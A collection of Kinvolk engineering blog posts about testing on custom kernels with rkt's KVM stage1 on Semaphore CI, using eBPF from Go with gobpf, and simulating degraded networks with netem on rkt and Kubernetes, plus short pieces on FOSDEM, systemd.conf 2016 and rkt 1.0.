SemaphoreCI supports running Docker inside of the test environment. This is possible because the test environment they provide for this is simply a VM. For rkt, this allowed us to run automatic tests for the container runtime each time a PR was submitted and/or changed.

However, it doesn’t solve the problem of testing on various kernels and kernel configurations as we want for gobpf and tcptracer-bpf. Luckily, this is where rkt and its KVM stage1 come to the rescue.

Our solution

To continuously test the work we are doing on Weave Scope, tpctracer-bpf and gobpf, we not only need a relatively new Linux kernel, but also require a subset of features like CONFIG_BPF=y or CONFIG_HAVE_KPROBES=y to be enabled.

With rkt’s KVM stage1 we can run our software in a virtual machine and, thanks to rkt’s modular architecture, build and use a custom stage1 suited to our needs. This allows us to run our tests on any platform that allows rkt to run; in our case, Semaphore CI.

Building a custom rkt stage1 for KVM

Our current approach relies on App Container Image (ACI) dependencies. All of our custom stage1 images are based on rkt’s upstream stage1-kvm image. In this way, we can apply changes to particular components (e.g. the Linux kernel) while reusing the other parts of the upstream stage1 image.

An ACI manifest template for such an image could look like the following.

        "acKind": "ImageManifest",
        "acVersion": "0.8.9",
        "name": "{{kernel_version}}",
        "labels": [
                        "name": "arch",
                        "value": "amd64"
                        "name": "os",
                        "value": "linux"
                        "name": "version",
                        "value": "0.1.0"
        "annotations": [
                        "name": "",
                        "value": "/init"
                        "name": "",
                        "value": "/enter_kvm"
                        "name": "",
                        "value": "/gc"
                        "name": "",
                        "value": "/stop_kvm"
                        "name": "",
                        "value": "/app-add"
                        "name": "",
                        "value": "/app-rm"
                        "name": "",
                        "value": "/app-start"
                        "name": "",
                        "value": "/app-stop"
                        "name": "",
                        "value": "5"
        "dependencies": [
                        "imageName": "",
                        "labels": [
                                        "name": "os",
                                        "value": "linux"
                                        "name": "arch",
                                        "value": "amd64"
                                        "name": "version",
                                        "value": "1.23.0"

Note: rkt doesn’t automatically fetch stage1 dependencies and we have to pre-fetch those manually.

To build a kernel (arch/x86/boot/bzImage), we use make bzImage after applying a single patch to the source tree. Without the patch, the kernel would block and not return control to rkt.

# change directory to kernel source tree
curl -LsS -O
patch --silent -p1 < 0001-reboot.patch
# configure kernel
make bzImage

We now can combine the ACI manifest with a root filesystem holding our custom built kernel, for example:

├── manifest
└── rootfs
    └── bzImage

We are now ready to build the stage1 ACI with actool:

actool build --overwrite aci/4.9.4 my-custom-stage1-kvm.aci

Run rkt with a custom stage1 for KVM

rkt offers multiple command line flags for specifying a stage1; we use --stage1-path. To smoke test our newly built stage1, we run a Debian Docker container and call uname -r to make sure our custom-built kernel is actually used:

rkt fetch image # due to rkt issue #2241
rkt run \
  --insecure-options=image \
  --stage1-path=./my-custom-stage1-kvm.aci \
  docker://debian --exec=/bin/uname -- -r

We set CONFIG_LOCALVERSION="-kinvolk-v1" in the kernel config and the version is correctly shown as 4.9.4-kinvolk-v1.

Run on Semaphore CI

Semaphore does not include rkt by default on their platform. Hence, we have to download rkt as a first step:


readonly rkt_version="1.23.0"

if [[ ! -f "./rkt/rkt" ]] || \
  [[ ! "$(./rkt/rkt version | awk '/rkt Version/{print $3}')" == "${rkt_version}" ]]; then

  curl -LsS "${rkt_version}/rkt-v${rkt_version}.tar.gz" \
    -o rkt.tgz

  mkdir -p rkt
  tar -xvf rkt.tgz -C rkt --strip-components=1
fi

After that we can pre-fetch the stage1 image we depend on and then run our tests. Note that we now use ./rkt/rkt. And we use timeout to make sure our tests fail if they cannot be finished in a reasonable amount of time.


sudo ./rkt/rkt image fetch --insecure-options=image
sudo timeout --foreground --kill-after=10 5m \
  ./rkt/rkt run \
  --uuid-file-save=./rkt-uuid \
  --insecure-options=image,all-run \
  --stage1-path=./rkt/my-custom-stage1-kvm.aci \
  --exec=/bin/sh -- -c \
  'cd /go/... ; \
    go test -v ./...'

--uuid-file-save=./rkt-uuid is required to determine the UUID of the started container. After the test finishes, we read the UUID from ./rkt-uuid to look up the container’s exit status (since it is not propagated on the KVM stage1) and exit accordingly:


test_status=$(sudo ./rkt/rkt status $(<rkt-uuid) | awk '/app-/{split($0,a,"=")} END{print a[2]}')
exit $test_status

Bind mount directories from stage1 into stage2

If you want to provide data to stage2 from stage1 you can do this with a small systemd drop-in unit to bind mount the directories. This allows you to add or modify content without actually touching the stage2 root filesystem.

We did the following to provide the Linux kernel headers to stage2:

# add systemd drop-in to bind mount kernel headers
mkdir -p "${rootfs_dir}/etc/systemd/system/[email protected]"
cat <<EOF >"${rootfs_dir}/etc/systemd/system/[email protected]/10-bind-mount-kernel-header.conf"
[Service]
ExecStartPost=/usr/bin/mkdir -p %I/${kernel_header_dir}
ExecStartPost=/usr/bin/mount --bind "${kernel_header_dir}" %I/${kernel_header_dir}
EOF

Note: for this to work you need to have mkdir in stage1, which is not included in the default rkt stage1-kvm. We use the one from busybox.

Automating the steps

We want to be able to do this for many kernel versions. Thus, we have created a tool, stage1-builder, that does most of this for us. With stage1-builder you simply need to add the kernel configuration to the config directory and run the ./builder script. The result is an ACI file containing our custom kernel with a dependency on the upstream kvm-stage1.


With SemaphoreCI providing us with a proper VM and rkt’s modular stage1 architecture, we have put together a CI pipeline that allows us to test gobpf and tcptracer-bpf on various kernels. In our opinion this setup is much preferable to the alternative, setting up and maintaining Jenkins.

It is worth pointing out that we did not have to use or make changes to rkt’s build system. Leveraging ACI dependencies was all we needed to swap out the KVM stage1 kernel. For the simple case of testing software on various kernel versions, rkt’s modular design has proven to be very useful.

Kinvolk Presenting at FOSDEM 2017

The same procedure as last year, Miss Sophie?
The same procedure as every year, James!

As with every year, we’ve reserved the first weekend of February to attend FOSDEM, the premier open-source conference in Europe. We’re looking forward to having drinks and chatting with other open-source contributors and enthusiasts.

But it’s not all fun and games for us. The Kinvolk team has three talks; one each in the Go, Testing and Automation, & Linux Containers and Microservices devrooms.

The talks

We look forward to sharing our work and having conversations about the following topics…

If you’ll be there and are interested in those, or other projects we work on, please do track us down.

We look forward to seeing you there!

Introducing gobpf - Using eBPF from Go

Gopher by Takuya Ueda - CC BY 3.0

What is eBPF?

eBPF is a “bytecode virtual machine” in the Linux kernel that is used for tracing kernel functions, networking, performance analysis and more. Its roots lie in the Berkeley Packet Filter (sometimes called LSF, Linux Socket Filtering), but as it supports more operations (e.g. BPF_CALL 0x80 /* eBPF only: function call */) and nowadays has much broader use than packet filtering on a socket, it’s called extended BPF.

With the addition of the dedicated bpf() syscall in Linux 3.18, it became easier to perform the various eBPF operations. Further, the BPF compiler collection from the IO Visor Project and its libbpf provide a rich set of helper functions as well as Python bindings that make it more convenient to write eBPF powered tools.

To get an idea of how eBPF looks, let’s take a peek at struct bpf_insn prog[], a list of instructions in pseudo-assembly. Below we have a simple user-space C program to count the number of fchownat(2) calls. We use bpf_prog_load from libbpf to load the eBPF instructions as a kprobe and use bpf_attach_kprobe to attach it to the syscall. Now each time fchownat is called, the kernel executes the eBPF program. The program loads the map (more about maps later), increments the counter and exits. In the C program, we read the value from the map and print it every second.

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <linux/version.h>

#include <bcc/bpf_common.h>
#include <bcc/libbpf.h>

int main() {
	int map_fd, prog_fd, key=0, ret;
	long long value;
	char log_buf[8192];
	void *kprobe;

	/* Map size is 1 since we store only one value, the chown count */
	map_fd = bpf_create_map(BPF_MAP_TYPE_HASH, sizeof(key), sizeof(value), 1);
	if (map_fd < 0) {
		fprintf(stderr, "failed to create map: %s (ret %d)\n", strerror(errno), map_fd);
		return 1;
	}

	ret = bpf_update_elem(map_fd, &key, &value, 0);
	if (ret != 0) {
		fprintf(stderr, "failed to initialize map: %s (ret %d)\n", strerror(errno), ret);
		return 1;
	}

	struct bpf_insn prog[] = {
		/* Put 0 (the map key) on the stack */
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
		/* Put frame pointer into R2 */
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
		/* Decrement pointer by four */
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
		/* Put map_fd into R1 */
		BPF_LD_MAP_FD(BPF_REG_1, map_fd),
		/* Load current count from map into R0 */
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
		/* If returned value NULL, skip two instructions and return */
		BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 2),
		/* Put 1 into R1 */
		BPF_MOV64_IMM(BPF_REG_1, 1),
		/* Increment value by 1 */
		BPF_RAW_INSN(BPF_STX | BPF_XADD | BPF_DW, BPF_REG_0, BPF_REG_1, 0, 0),
		/* Return from program */
		BPF_EXIT_INSN(),
	};

	prog_fd = bpf_prog_load(BPF_PROG_TYPE_KPROBE, prog, sizeof(prog), "GPL", LINUX_VERSION_CODE, log_buf, sizeof(log_buf));
	if (prog_fd < 0) {
		fprintf(stderr, "failed to load prog: %s (ret %d)\ngot CAP_SYS_ADMIN?\n%s\n", strerror(errno), prog_fd, log_buf);
		return 1;
	}

	kprobe = bpf_attach_kprobe(prog_fd, "p_sys_fchownat", "p:kprobes/p_sys_fchownat sys_fchownat", -1, 0, -1, NULL, NULL);
	if (kprobe == NULL) {
		fprintf(stderr, "failed to attach kprobe: %s\n", strerror(errno));
		return 1;
	}

	for (;;) {
		ret = bpf_lookup_elem(map_fd, &key, &value);
		if (ret != 0) {
			fprintf(stderr, "failed to lookup element: %s (ret %d)\n", strerror(errno), ret);
		} else {
			printf("fchownat(2) count: %lld\n", value);
		}
		sleep(1);
	}

	return 0;
}

The example requires libbcc and can be compiled with:

gcc -I/usr/include/bcc/compat main.c -o chowncount -lbcc

Nota bene: the increment in the example code is not atomic. In real code, we would have to use one map per CPU and aggregate the result.

It is important to know that eBPF programs run directly in the kernel and that their invocation depends on the type. They are executed without change of context. As we have seen above, kprobes for example are triggered whenever the kernel executes a specified function.

Thanks to clang and LLVM, it’s not necessary to actually write plain eBPF instructions. Modules can be written in C and use functions provided by libbpf (as we will see in the gobpf example below).

eBPF Program Types

The type of an eBPF program defines properties like the kernel helper functions available to the program or the input it receives from the kernel. Linux 4.8 knows the following program types:

enum bpf_prog_type {

A program of type BPF_PROG_TYPE_SOCKET_FILTER, for instance, receives a struct __sk_buff * as its first argument whereas it’s struct pt_regs * for programs of type BPF_PROG_TYPE_KPROBE.

eBPF Maps

Maps are a “generic data structure for storage of different types of data” and can be used to share data between eBPF programs as well as between kernel and userspace. The key and value of a map can be of arbitrary size as defined when creating the map. The user also defines the maximum number of entries (max_entries). Linux 4.8 knows the following map types:

enum bpf_map_type {

While BPF_MAP_TYPE_HASH and BPF_MAP_TYPE_ARRAY are generic maps for different types of data, BPF_MAP_TYPE_PROG_ARRAY is a special purpose array map. It holds file descriptors referring to other eBPF programs and can be used by an eBPF program to “replace its own program flow with the one from the program at the given program array slot”. The BPF_MAP_TYPE_PERF_EVENT_ARRAY map is for storing data of type struct perf_event in a ring buffer.

In the example above we used a map of type hash with a size of 1 to hold the call counter.


gobpf

In the context of the work we are doing on Weave Scope for Weaveworks, we have been working extensively with both eBPF and Go. As Scope is written in Go, it makes sense to use eBPF directly from Go.

In looking at how to do this, we stumbled upon some code in the IO Visor Project that looked like a good starting point. After talking to the folks at the project, we decided to move this out into a dedicated repository: gobpf is a Go library that leverages the bcc project to make working with eBPF programs from Go simple.

To get an idea of how this works, the following example chrootsnoop shows how to use a bpf.PerfMap to monitor chroot(2) calls:

package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"os"
	"os/signal"
	"unsafe"

	bpf ""
)

import "C"

const source string = `
#include <uapi/linux/ptrace.h>
#include <bcc/proto.h>

typedef struct {
	u32 pid;
	char comm[128];
	char filename[128];
} chroot_event_t;

BPF_PERF_OUTPUT(chroot_events);

int kprobe__sys_chroot(struct pt_regs *ctx, const char *filename)
{
	u64 pid = bpf_get_current_pid_tgid();
	chroot_event_t event = {
		.pid = pid >> 32,
	};
	bpf_get_current_comm(&event.comm, sizeof(event.comm));
	bpf_probe_read(&event.filename, sizeof(event.filename), (void *)filename);
	chroot_events.perf_submit(ctx, &event, sizeof(event));
	return 0;
}
`

type chrootEvent struct {
	Pid      uint32
	Comm     [128]byte
	Filename [128]byte
}

func main() {
	m := bpf.NewBpfModule(source, []string{})
	defer m.Close()

	chrootKprobe, err := m.LoadKprobe("kprobe__sys_chroot")
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to load kprobe__sys_chroot: %s\n", err)
		os.Exit(1)
	}

	err = m.AttachKprobe("sys_chroot", chrootKprobe)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to attach kprobe__sys_chroot: %s\n", err)
		os.Exit(1)
	}

	chrootEventsTable := bpf.NewBpfTable(0, m)

	chrootEventsChannel := make(chan []byte)

	chrootPerfMap, err := bpf.InitPerfMap(chrootEventsTable, chrootEventsChannel)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to init perf map: %s\n", err)
		os.Exit(1)
	}

	sig := make(chan os.Signal, 1)
	signal.Notify(sig, os.Interrupt, os.Kill)

	go func() {
		var chrootE chrootEvent
		for {
			data := <-chrootEventsChannel
			err := binary.Read(bytes.NewBuffer(data), binary.LittleEndian, &chrootE)
			if err != nil {
				fmt.Fprintf(os.Stderr, "Failed to decode received chroot event data: %s\n", err)
				continue
			}
			comm := (*C.char)(unsafe.Pointer(&chrootE.Comm))
			filename := (*C.char)(unsafe.Pointer(&chrootE.Filename))
			fmt.Printf("pid %d %s called chroot(2) on %s\n", chrootE.Pid, C.GoString(comm), C.GoString(filename))
		}
	}()

	chrootPerfMap.PollStart()
	<-sig
	chrootPerfMap.PollStop()
}

You will notice that our eBPF program is written in C for this example. The bcc project uses clang to convert the code to eBPF instructions.

We don’t have to interact with libbpf directly from our Go code, as gobpf implements a callback and makes sure we receive the data from our eBPF program through the chrootEventsChannel.

To test the example, you can run it with sudo -E go run chrootsnoop.go and, for instance, execute any systemd unit with a RootDirectory= statement. A simple chroot ... also works, of course.

# hello.service
[Unit]
Description=hello service

[Service]
RootDirectory=/tmp/chroot
# path of the binary inside the chroot (assumed for illustration)
ExecStart=/hello
You should see output like:

pid 7857 hello called chroot(2) on /tmp/chroot


With its growing capabilities, eBPF has become an indispensable tool for modern Linux system software. gobpf helps you to conveniently use libbpf functionality from Go.

gobpf is in a very early stage, but usable. Input and contributions are very much welcome.

If you want to learn more about our use of eBPF in software like Weave Scope, stay tuned and have a look at our work on GitHub:

Follow Kinvolk on Twitter to get notified when new blog posts go live.

Testing web services with traffic control on Kubernetes

This is part 2 of our “testing applications with traffic control series”. See part 1, testing degraded network scenarios with rkt, for detailed information about how traffic control works on Linux.

In this installment we demonstrate how to test web services with traffic control on Kubernetes. We introduce tcd, a simple traffic control daemon developed by Kinvolk for this demo. Our demonstration system runs on OpenShift 3, Red Hat’s container platform based on Kubernetes, and uses the excellent Weave Scope, an interactive container monitoring and visualization tool.

We’ll be giving a live demonstration of this at the OpenShift Commons Briefing on May 26th, 2016. Please join us there.

The premise

As discussed in part 1 of this series, tests generally run under optimal networking conditions. This means that standard testing procedures neglect a whole bevy of issues that can arise due to poor network conditions.

Would it not be prudent to also test that your services perform satisfactorily when there is, for example, high packet loss, high latency, a slow rate of transmission, or a combination of those? We think so, and if you do too, please read on.

Traffic control on a distributed system

Let’s now make things more concrete by using tcd in our Kubernetes cluster.

The setup

To get started, we need to start an OpenShift ready VM to provide us our Kubernetes cluster. We’ll then create an OpenShift project and do some configuration.

If you want to follow along, you can go to our demo repository which will guide you through installing and setting up things.

The pieces

Before diving into the traffic control demo, we want to give you a really quick overview of tcd, OpenShift and Weave Scope.

tcd (traffic control daemon)

tcd is a simple daemon that runs on each Kubernetes node and responds to API calls. tcd manipulates the traffic control settings of the pods using the tc command which we briefly mentioned in part 1. It’s decoupled from the service being tested, meaning you can stop and restart the daemon on a pod without affecting its connectivity.

In this demo, it receives commands from buttons exposed in Weave Scope.


OpenShift

OpenShift is Red Hat’s container platform that makes it simple to build, deploy, manage and secure containerized applications at scale on any cloud infrastructure, including Red Hat’s own hosted offering, OpenShift Dedicated. Version 3 of OpenShift uses Kubernetes under the hood to maintain cluster health and easily scale services.

In the following figure, you see an example of the OpenShift dashboard with the running pods.

Here we have 1 Weave Scope App pod, 3 ping test pods, 1 tcd pod, and 1 Weave Scope probe pod. Using the arrow buttons, one can scale the application up and down, and the circle changes color depending on the status of the application (e.g. scaling, terminating, etc.).

Weave Scope

Weave Scope helps to intuitively understand, monitor, and control containerized applications. It visually represents pods and processes running on Kubernetes and allows one to drill into pods, showing information such as CPU & memory usage, running processes, etc. One can also stop, start, and interact with containerized applications directly through its UI.

While this graphic shows Weave Scope displaying containers, we see at the top that we can also display information about processes and hosts.

How the pieces fit together

Now that we understand the individual pieces, let’s see how it all works together. Below is a diagram of our demo system.

Here we have 2 Kubernetes nodes each running one instance of the tcd daemon. tcd can only manage the traffic control settings of pods local to the Kubernetes node on which it’s running, thus the need for one per node.
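On Kubernetes, the natural way to run one tcd instance per node is a DaemonSet. The following is only a sketch: the image name, labels, and API version are assumptions, not the demo’s actual configuration, and the container needs CAP_NET_ADMIN to manipulate qdiscs.

```shell
# Sketch of a DaemonSet running tcd on every node; the image name,
# labels, and API version are placeholders, not the demo's real config.
cat > /tmp/tcd-daemonset.yaml <<'EOF'
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: tcd
spec:
  template:
    metadata:
      labels:
        app: tcd
    spec:
      hostNetwork: true
      containers:
      - name: tcd
        image: kinvolk/tcd    # placeholder image
        securityContext:
          capabilities:
            add: ["NET_ADMIN"]
EOF
# oc create -f /tmp/tcd-daemonset.yaml
```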

On the right we see the Weave Scope app showing details for the selected pod; in this case, the one being pointed to by (4). In the red oval, we see the three buttons we’ve added to the Scope app for this demo. From left to right, they set the latency of the selected pod’s egress traffic to 2000ms, 300ms, and 1ms, respectively.

When clicked (1), the Scope app sends a message (2) to the Weave Scope probe running on the selected pod’s Kubernetes node. The Weave Scope probe then sends a gRPC message (3), in this case a ConfigureEgressMethod message, to the tcd daemon running on that node, telling it to configure the pod’s egress traffic (4) accordingly.

While this demo only configures the latency, tcd can also be used to configure the bandwidth and the percentage of packet drop. As we saw in part 1, those parameters are features directly provided by the Linux netem queuing discipline.
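Each of those settings ultimately boils down to a single netem invocation. The sketch below only composes the command lines as a dry run; tcd executes the equivalent inside the selected pod’s network namespace, and the device name eth0 is an assumption.

```shell
# Compose tc/netem commands (dry run only). tcd runs the equivalent
# inside the pod's network namespace; "eth0" is an assumed device name.
netem_cmd() {
        local dev=$1; shift
        echo "tc qdisc replace dev $dev root netem $*"
}

netem_cmd eth0 delay 300ms      # latency
netem_cmd eth0 loss 3%          # packet drop
netem_cmd eth0 rate 1mbit       # bandwidth
```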

Being able to dynamically change the network characteristics of each pod, we can observe the behaviour of services during transitions as well as in steady state. Of course, by observe we mean test, which we’ll turn to now.

Testing with traffic control

Now for 2 short demos to show how traffic control can be used for testing.

Ping test

This is a contrived demo to show that the setup works and we can, in fact, manipulate the egress traffic characteristics of a pod.

The following video shows a pod downloading a small file from the Internet with the wget command, with the target host being the one for which we are adjusting the packet latency.

It should be easy to see the effects that adjusting the latency has; with greater latency, it takes longer to get a reply.

Guestbook app test

We use the Kubernetes guestbook example for our next, more real-world, demo. Some small modifications have been made to provide user-feedback when the reply from the web server takes a long time, showing a “loading…” message. Generally, this type of thing goes untested because, as we mentioned in the introduction, our tests run under favorable networking conditions.

Tools like Selenium and agouti allow for testing web applications in an automated way without manually interacting with a browser. For this demo we’ll be using agouti with its Chrome backend so that we can see the test run.

In the following video we see this feature being automatically tested by a Go script using the Ginkgo testing framework and Gomega matcher library.

In this demo, testers still need to configure the traffic control latency manually by clicking on the Weave Scope app buttons before running the test. However, since tcd can accept commands over gRPC, the Go script could easily connect to tcd to perform that configuration automatically, and dynamically, at run time. We’ll leave that as an exercise for the reader. :)


With Kubernetes becoming a de facto building block of modern container platforms, we now have a basis on which to start integrating, in a standardized way, features that have long gone ignored. We think traffic control for testing, and other creative endeavors, is a good example of this.

If you’re interested in moving this forward, we encourage you to take what we’ve started and run with it. And whether you just want to talk to us about this or you need professional support in your efforts, we’d be happy to talk to you.

Thanks to…

We’d like to thank Ilya & Tom from Weaveworks and Jorge & Ryan from Red Hat for helping us with some technical issues we ran into while setting up this demo. And a special thanks to Diane from the OpenShift project for helping coordinate the effort.

Introducing systemd.conf 2016

The systemd project will be having its 2nd conference—systemd.conf—from Sept. 28th to Oct. 1st, once again at betahaus in Berlin. After the success of last year’s conference, we’re looking forward to having much of the systemd community in Berlin for a second consecutive year. As this year’s event takes place just before LinuxCon Europe, we’re expecting some new faces.

Kinvolk’s involvement

As an active user and contributor to systemd, currently through our work on rkt, we’re interested in promoting systemd and helping provide a place for the systemd community to gather.

Last year, Kinvolk helped with much of the organization. This year, we’re happy to be expanding our involvement to include handling the financial-side of the event.

In general, Kinvolk is willing to help provide support to open source projects who want to hold events in Berlin. Just send us a mail to [email protected].

Don’t fix what isn’t broken

As feedback from last year’s post-conference survey showed, most attendees were pleased with the format. Thus, very little will change this year. The biggest difference is that we’re adding another room to accommodate a few more people and to facilitate impromptu breakout sessions. Among the smaller changes, we’ll have warm lunches instead of sandwiches, and we’ve dropped the speakers’ dinner as we felt it wasn’t in line with the goal of bringing all attendees together.

Workshop day

A new addition to systemd.conf is the workshop day. The audience for systemd.conf 2015 was predominantly systemd contributors and proficient users. This was very much expected and intended.

However, we also want to give people of varying familiarity with the systemd project the chance to learn more from the people who know it best. The workshop day is intended to facilitate this. The call for presentations (CfP) will include a call for workshop sessions. These workshop sessions will be 2 to 3-hour hands-on sessions covering various areas of, or related to, the systemd project. You can consider it a day of systemd training if that helps with getting approval to attend. :)

As we expect a different audience for workshops than for the presentation and hackfest days, we will be issuing separate tickets. Tickets will become available once the call for participation opens.

Get involved!

There are several ways you can help make systemd.conf 2016 a success.

Become a sponsor

These events are only possible with the support of sponsors. In addition to making the event more awesome, your sponsorship allows us to bring more of the community together by sponsoring the attendance of those community members who need financial assistance to attend.

See the systemd.conf 2016 website for how to become a sponsor.

Submitting talk and workshop proposals

systemd.conf is only as good as the people who attend and the content they provide. In a few weeks we’ll be announcing the opening of the CfP. If you, or your organization, are doing interesting things with systemd, we encourage you to submit a proposal. And if you want to share your knowledge of systemd with others, please consider submitting a proposal for a workshop session.

We’re excited about what this year’s event will bring and look forward to seeing you at systemd.conf 2016!

Testing Degraded Network Scenarios with rkt

The current state of testing

Testing applications is important. Some even go as far as saying, “If it isn’t tested, it doesn’t work”. While that may have both a degree of truth and untruth to it, the rise of continuous integration (CI) and automated testing have shown that the software industry is taking testing seriously.

However, there is at least one area of testing that is difficult to automate and, thus, hasn’t been adequately incorporated into testing scenarios: poor network connectivity.

The typical testing process has the developer as the first line of defence. Developers usually work within reliable networking conditions. The developers then submit their code to a CI system which also runs tests under good networking conditions. Once the CI system goes green, internal testing is usually done; ship it!

Nowhere in this process were scenarios tested where your application experiences degraded network conditions. If your internal tests don’t cover these scenarios, then it’s your users who’ll be doing the testing. This is far from an ideal situation and goes against the “test early, test often” mantra of CI; a bug will cost you more the later it’s caught.

Three examples

To make this more concrete, let’s look at a few examples where users might notice issues that you, or your testing infrastructure, may not:

  • A web shop: You click on “buy”, and the site redirects to a new page but freezes because of a connection issue. The user gets no feedback on whether the JavaScript code will retry automatically; the user does not know whether she should refresh. That’s a bug. Once fixed, how do you test it? You need to break the connection just before the test script clicks on the “buy” link.
  • A video stream server: The Real-time Transport Protocol (RTP) uses UDP packets. If some packets drop or arrive too late, it’s not a big deal; the video player will display a degraded video because of the missing packets, but the stream will otherwise play just fine. Or will it? How can the developers of a video stream server test a scenario where 3% of packets are dropped or delayed?
  • Applications like etcd or ZooKeeper implement a consensus protocol. They should be designed to handle a node disconnecting from the network and network splits. See the approach CoreOS takes for an example.

It doesn’t take much imagination to come up with more, but these should be enough to make the point.

Where Linux can help

What functionality does the Linux kernel provide to enable us to test these scenarios?

Linux provides a means to shape both the egress traffic (emitted by a network interface) and, to some extent, the ingress traffic (received by a network interface). This is done by way of qdiscs, short for queuing disciplines. In essence, a qdisc is a packet scheduler. Using different qdiscs we can change the way packets are scheduled. qdiscs can have associated classes and filters. These all combine to let us delay, drop, or rate-limit packets, among a host of other things. A complete description is out of the scope of this blog post.

For our purposes, we’ll just look at one qdisc called “netem”, short for network emulation. This will allow us to tweak the packet scheduling characteristics we want.

What about containers?

Up to this point we haven’t even mentioned containers. That’s because the story is the same with regards to traffic control whether we’re talking about bare-metal servers, VMs or containers. Containers reside in their own network namespace, providing the container with a completely isolated network. Thus, the traffic between containers, or between a container and the host, can all be shaped in the same way.

Testing the idea

As a demonstration, I’ve created a simple demo that starts an RTP server in a container using rkt. To easily tweak network parameters, I’ve hacked up a GUI written in Gtk/JavaScript. And finally, to see the results, we just need to point a video player at our RTP server.

We’ll step through the demo below. But if you want to play along at home, you can find the code in the kinvolk/demo repo on GitHub.

Running the demo

First, I start the video streaming server in a rkt pod. The server streams the Elephants Dream movie to a media player via the RTP/RTSP protocols. RTSP uses a TCP connection to send commands to the server, such as choosing the file to play or seeking to a point in the middle of the stream. RTP is what actually sends the video, via UDP packets.

Second, we start the GUI to dynamically change some parameters of the network emulator. What this does is connect to the rkt network namespace and change the egress qdisc using Linux’s tc command.
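In other words, the GUI resolves the pod’s network namespace and runs tc inside it. A sketch of the mechanics follows; the leader PID (1234) and the device name eth0 are placeholders, not values from the actual demo.

```shell
# Resolve a pod's network namespace from its leader process and print
# the command that would add 5% packet loss to its egress traffic.
# PID 1234 and eth0 are placeholders for the real pod's values.
PID=1234
NETNS=/proc/$PID/ns/net
echo "sudo nsenter --net=$NETNS -- tc qdisc replace dev eth0 root netem loss 5%"
```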

Now we can adjust the values as we like. For example, when I add 5% packet loss, the quality is degraded but not interrupted. When I remove the packet loss, the video becomes clear again. When I add 10s latency in the network, the video freezes. Play the video to see this in action.

What this shows us is that traffic control can be used effectively with containers to test applications - in this case a media server.

Next steps

The drawback to this approach is that it’s still manual. For automated testing we don’t want a GUI. Rather, we need a means of scripting various scenarios.

In rkt we use CNI network plugins to configure the network. Interestingly, several plugins can be used together to define several network interfaces. What I’d like to see is a plugin added that allows one to configure traffic control in the network namespace of the container.

In order to integrate this into testing frameworks, the traffic control parameters should be dynamically adjustable, allowing for the scriptability mentioned above.
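No such plugin exists today, but to make the idea concrete, a CNI network configuration embedding traffic control parameters might look something like this sketch; the “tc” plugin type and its keys are invented for illustration.

```shell
# Hypothetical CNI network configuration with traffic-control
# parameters; the "tc" plugin type and its keys do not exist (yet).
cat > /tmp/10-testnet-tc.conf <<'EOF'
{
    "name": "testnet",
    "type": "tc",
    "delay": "300ms",
    "loss": "3%"
}
EOF
```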

Stay tuned…

In a coming blog post, we’ll show that this is not only interesting when using rkt as an isolated component. It’s more interesting when tested in a container orchestration system like Kubernetes.

Follow Kinvolk on Twitter to get notified when new blog posts go live.

Welcome rkt 1.0!

About 14 months ago, CoreOS announced their intention to build a new container runtime based on the App Container Specification, introduced at the same time. Over the past 14 months, the rkt team has worked to make rkt viable for production use and to get to a point where it could offer certain stability guarantees. With today’s release of rkt 1.0, the rkt team believes it has reached that point.

We’d like to congratulate CoreOS on making it to this milestone and look forward to seeing rkt mature. With rkt, CoreOS has provided the community with a container runtime with first-class integration on modern Linux systems and a security-first approach.

We’d especially like to thank CoreOS for giving us the chance to be involved with rkt. Over the past months we’ve had the pleasure to make substantial contributions to rkt. Now that the 1.0 release is out, we look forward to continuing that, with even greater input from and collaboration with the community.

At Kinvolk, we want to push Linux forward by contributing to projects that are at the core of modern Linux systems. We believe that rkt is one of these technologies. We are especially happy that we could work to make the integration with systemd as seamless as possible. There’s still work on this front to do but we’re happy with where we’ve gotten so far.

rkt is so important because it fills a hole that was left by other container runtimes. It lets the operating system do what it does best, manage processes. We believe whole-heartedly when Lennart, creator and lead developer of the systemd project, states…

I believe in the rkt model. Integrating container and service management, so that there's a 1:1 mapping between containers and host services is an excellent idea. Resource management, introspection, life-cycle management of containers and services -- all that tightly integrated with the OS, that's how a container manager should be designed.

Lennart Poettering

Over the next few weeks, we’ll be posting a series of blog stories related to rkt. Follow Kinvolk on Twitter to get notified when they go live and follow the story.

FOSDEM 2016 Wrap-up: Bowling with Containers

Another year, another trip to FOSDEM, arguably the best free & open source software event in the world, but definitely the best in Europe. FOSDEM offers an amazingly broad range of talks which is only surpassed by the richness of its hallway track… and maybe the legendary beer event. ;)

This year our focus was to talk to folks about rkt, the container runtime we work on with CoreOS, and meet more people from the container development community, along with the usual catching up with old friends.

On Saturday, Alban gave a talk with CoreOS’ Jon Boulle entitled “Container mechanics in rkt and Linux”, where Jon presented a general overview of the rkt project and Alban followed with a deep dive into how containers work on Linux, and in rkt specifically. The talk was very well attended. If you weren’t able to attend however, you can find the slides here.

For Saturday evening, we had organized a bowling event for some of the people involved in rkt, and containers on Linux in general. A majority of the people attending we’d not yet met IRL. We finally got a chance to meet the team from Intel Poland who have been working on rkt’s LKVM stage1, the BlaBlaCar team—brave early adopters of rkt—as well as some folks from NTT and Virtuozzo. There were also a few folks we see quite often from Red Hat, Giant Swarm and of course the team from CoreOS. As it turns out, the best bowler was the aforementioned Jon Boulle, who bowled a very respectable score of 120.

Having taken the FOSDEM pilgrimage about 20 times collectively now, the Kinvolk team are veterans of the event. However, each year brings new, exciting topics of discussion. These are mostly shaped by one’s own interests (containers and SDN for us) but also by new trends within the community. We’re already excited to see what next year will bring. We hope to see you there!

Testing systemd Patches

It’s not so easy to test new patches for systemd. Because systemd is the first process started on boot, the traditional way to test was to install the new version on your own computer and reboot. However, this approach is not practical because it makes the development cycle quite long: after writing a few lines of code, I don’t want to close all my applications and reboot. There is also a risk that my patch contains some bugs and if I install systemd on my development computer, it won’t boot. It would then take even more time to fix it. All of this probably just to test a few lines of code.

